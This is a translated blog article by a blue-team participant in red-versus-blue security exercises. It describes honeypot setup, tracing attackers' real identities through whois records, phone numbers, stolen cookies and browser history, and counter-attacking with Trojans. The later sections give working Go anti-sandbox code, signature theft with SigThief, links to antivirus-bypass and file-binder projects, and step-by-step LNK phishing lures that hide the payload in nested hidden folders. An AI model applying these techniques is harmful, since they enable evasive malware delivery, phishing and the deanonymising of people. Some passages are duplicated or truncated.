Foreword
This article summarizes some experiences as a blue team based on recent PS games and previous cases. I hope it can be helpful to the blue team’s traceability score. If there are other tricks, please share them with the masters.
Traceability countermeasures have always been a common topic. It is a confrontational game between the red and blue sides. Even the professional red team will make mistakes sometimes. The reasons can be roughly summarized as follows:
-
The machines provided in the competition are too laggy, and using virtual machines to operate will affect efficiency. If you are in an impetuous mood, you can directly operate on the real machine.
-
The red team has poor operating habits, does not use clean virtual machines, and has traceable identity files or information on the machines.
-
“Most of the people who drown are people who can swim.” Because they have experience, they underestimate the enemy and have the mentality that they will not make mistakes.
-
Inaccurate identification of honeypots, failure to use incognito mode or identify honeypot plug-ins, and even share honeypots as results with teammates
-
The general process of countermeasures
Honeypot deployment
Deploying a high-simulation virtual environment, here are some things to pay attention to
-
The deployed honeypots must be reported to the referee in advance to avoid subsequent disputes, and the honeypots must be isolated separately to prevent horizontal spread.
-
The honeypot should not be too fake. For example, if multiple ports open different web services, the system should give the attacker the illusion that they have achieved results through their own efforts.
If you directly use the cloud honeypot of xx manufacturer, the characteristics are very obvious, and it is easy to put the honeypot tag on the surveying and mapping platform, and the conventional countermeasure function is useless and the triggering conditions are very harsh
This time, I directly used the Zhiyuan OA environment that was used for vulnerability debugging before. Considering that the attack team has a student team, a vulnerability environment with nday is retained so that it can directly use the one-click getshell tool for post-penetration exploitation.
To import the image to the cloud server, you need to download the driver from the following address, install it, and then export the image. Otherwise, the import will fail on the cloud server.
https://cloud.tencent.com/document/product/213/17815
After the establishment is successful, resolve the domain name to the IP. It is best to name the domain name mainly with characters in the common dictionary of demo and crm to ensure that it can be recognized by the sub-domain name scanner.
In addition, you can customize the redirect page to the honeypot address through waf to speed up the inclusion speed of surveying and mapping platforms such as fofa and hunter
After the honeypot is deployed, the next step is to choose the Trojan delivery. The file content can be selected as password book, internal VPN program, company address book and other things that attract attackers.
This time I chose to disguise the internal VPN program and cooperate with the documentation guidance to increase credibility and click-through rate
Since the attack team’s click on the honeypot is full of randomness, in order to counterattack in time, an online reminder can be set. For details, please refer to https://xz.aliyun.com/t/10698
Next, you can wait for good news and wait for the attacker to take the bait. The main thing is Jiang Taigong fishing.
Tracing back to the source
General traceability
The traceability scoring rules require cross-evidence and proof that the attacker has network security attack capabilities, and can collect the attacker’s IP from situational awareness or firewall
Fingerprinting is performed after IP deduplication, such as security blogs, scanners, etc. Tracing the source from these assets can improve efficiency. It is recommended to use ehole here.
https://github.com/EdgeSecurityTeam/EHole
For example, a port scan based on the IP revealed that it had built a lighthouse system 
And through the situational awareness platform, it was discovered that it has scanned recently. There is a high probability that it is the attack team ip
Go to Weibu for IP query and find that the IP is bound to a domain name. Domestic domain names need to register real names
By querying the domain name’s whois information, we can obtain the attacker’s name: Shen xx, qq email: [email protected]
Counter attack team member 1
The case comes from a recent PS game. In the quiet night, the online alarm suddenly sounded. I was about to pack my things and get off work. I suddenly felt no longer sleepy.
During the countermeasures process, due to turning things over too fast, some important content may be missed. It is recommended to record the screen while performing the operation.
The screen recording files on the machine were inferred to be members of the on-site attack team. However, because the video was too large to be copied for evidence collection, we had to find another way to confirm the attack team
The attacker has good operating habits and uses a virtual machine. He searched in various folders for a long time but did not find any files related to personal information. When he was at a loss, he suddenly found this entry in the browser history 
username turned out to be a mobile phone number. At first, I thought it was just an ordinary attack result but I didn’t pay attention. Baidu found out that it was a mobile phone from Wenzhou, Zhejiang. It obviously did not correspond to this hw. It was guessed that it was the attacker himself. Mobile
So I checked my personal information through my mobile phone number and got the name Chen xx, who studied at Zhejiang xxxx school. I searched for keywords through Google syntax and successfully located where he worked at xx Information Company
Confirm the identity of the attack team members twice through the internal address book and confirm that they are working laboratory personnel. In this way, all the information is correct and the work is over.
Interlude: The account password of the lighthouse system was also obtained from the browser history. The attack team should be grateful that I did not delete the task haha
Counter Attack Team Member 2
Another lucky player accidentally stepped on the can and found the cookie and token
After replacing the cookie, burp successfully obtained the attacker’s Baidu ID
Then I searched the Internet for information related to his name, and found that a technology blog had been set up, and I successfully located his real name Wu xx
And further confirm their identity through the CISP-PTE exam information on the machine
Counter attack team member 3
The quiet village suddenly received a WeChat friend request. As I was eating melon, I knew it was coming. I knew at a glance that it was an attack team fishing on WeChat, and I used it to coordinate with their performance
Here, hotspots and virtual machines are used to simulate a personal terminal environment, click on the Trojan program of the attack team, and place the anti-phishing Trojan file on the desktop xx Blue Party Information Table
The lnk file is used here. The production method can be checked through the lnk file production module behind. In order to prevent the content from being previewed when decompressing the file, we need to select the rar compressed file for encryption
In this way, only an independent lnk file will appear after decompression. In the later stage of hw, which was distracted, the attack team could easily relax their vigilance and not pay attention. In the end, the machine was successfully online 
Technical means involved
Trojan anti-killing
If you want to counterattack the attacking team, the first thing you need is a durable and non-killable Trojan that can resist and attack.
Shamelessly, I took the opportunity to advertise. After passing the Three Musketeers, which are common in domestic anti-virus software, adding anti-sandbox code can achieve micro-step green, within VT10
Rookie project: https://github.com/Pizz33/GobypassAV-shellcode
Good brother Wang Chaogong’s project: https://github.com/wangfly-me/SysHttpHookSleep
Anti-Sandbox
There are many traditional anti-sandboxes, such as detecting boot time, machine memory size, mouse movement and clicks, etc. Here are two more practical ones, and the rest can be explored slowly.
Check the number of desktop files
func desktop() {
desktopPath, err := os.UserHomeDir()
if err != nil {
fmt.Println("Unable to obtain user desktop path:", err)
return
}
desktopFiles, err := ioutil.ReadDir(filepath.Join(desktopPath, "Desktop"))
if err != nil {
fmt.Println("Unable to read user desktop file list:", err)
return
}
fileCount := len(desktopFiles)
fmt.Println("Number of user desktop files:", fileCount)
if fileCount < 10 {
os.Exit(0)
}
}
Check whether the running program names are consistent
func process() {
executablePath, err := os.Executable()
if err != nil {
// Handle errors
return
}
sourceFilename := filepath.Base(executablePath) // Source file name
processName := filepath.Base(os.Args[0]) //The name of the currently running process
// Compare the source file name and process name to see if they are the same
if strings.EqualFold(sourceFilename, processName) {
// The process name is the same as the source file name and runs normally
//Perform normal operations here
} else {
// The process name is different from the source file name and may be running in a sandbox environment
//Perform corresponding anti-sandbox operations here
os.Exit(0) //Exit the program
}
}
Resource replacement
After completing the anti-killing process, you will definitely need to disguise it as a normal file. Icons and signatures are very important, and they can avoid 360’s qvm detection to a certain extent.
https://github.com/secretsquirrel/SigThief
python sigthief.py -i 360Safe.exe -t notepad.exe -o tes.exe
After completing the anti-killing process, you will definitely need to disguise it as a normal file. Icons and signatures are very important, and they can avoid 360’s
qvm detectionto a certain extent.https://github.com/secretsquirrel/SigThief
python sigthief.py -i 360Safe.exe -t notepad.exe -o tes.exe
Digital Signature Tool Professional Edition_Code Signing Tool_Digital Signature Certificate Tool – Asia Integrity/TrustAsia
GitHub – JarlPenguin/BeCyIconGrabberPortable: BeCyIconGrabber allows you to extract icons from almost any file! Icon extractionGitHub – JarlPenguin/BeCyIconGrabberPortable: BeCyIconGrabber allows you to extract icons from almost any file!
icon replacement
Resource hacker
Trojan bundler
During the countermeasures process, if there is no response after the attacker runs the file, it will arouse the other party’s suspicion. At this time, it is necessary to release the prepared normal file to reduce the other party’s wariness.
https://github.com/H4de5-7/Bundler-bypass
Import normal files and Trojans, compile and generate 
ttps://github.com/Yihsiwei/GoFileBinder
Pitfalls:
1. The exe in the command must be placed before the release file. The order of the commands cannot be changed, otherwise it will not be released normally after generation.
2. The go version selected is 17. The test found that version 18 will fail to generate 
lnk file production
The structure of the phishing sample is as follows. The open folder is a shortcut and a hidden folder. There are multiple levels of directories in the hidden folder, and the real Trojan file is placed in the last level directory 
There is a real Trojan in the MACOS folder, and the folder is set to be hidden.
attrib + s + h + r C:\Users\Public\xxx.exe attrib -s -h -r C:\Users\Public\xxx.exe
The shortcut in the root directory modifies the target attribute, and the relative path points to the real horse.
%windir%\system32\cmd.exe /c start .\.__MACOS__\.__MACOS__\.__MACOS__\.__MACOS1__\xxx.doc & amp; & amp; C:\Windows\explorer.exe ".\. __MACOS__\.__MACOS__\.__MACOS__\.__MACOS1__\xxx.exe" C:\Windows\explorer.exe ".\.__MACOS__\.__MACOS__\.__MACOS__\.__MACOS1__\xxx.exe"
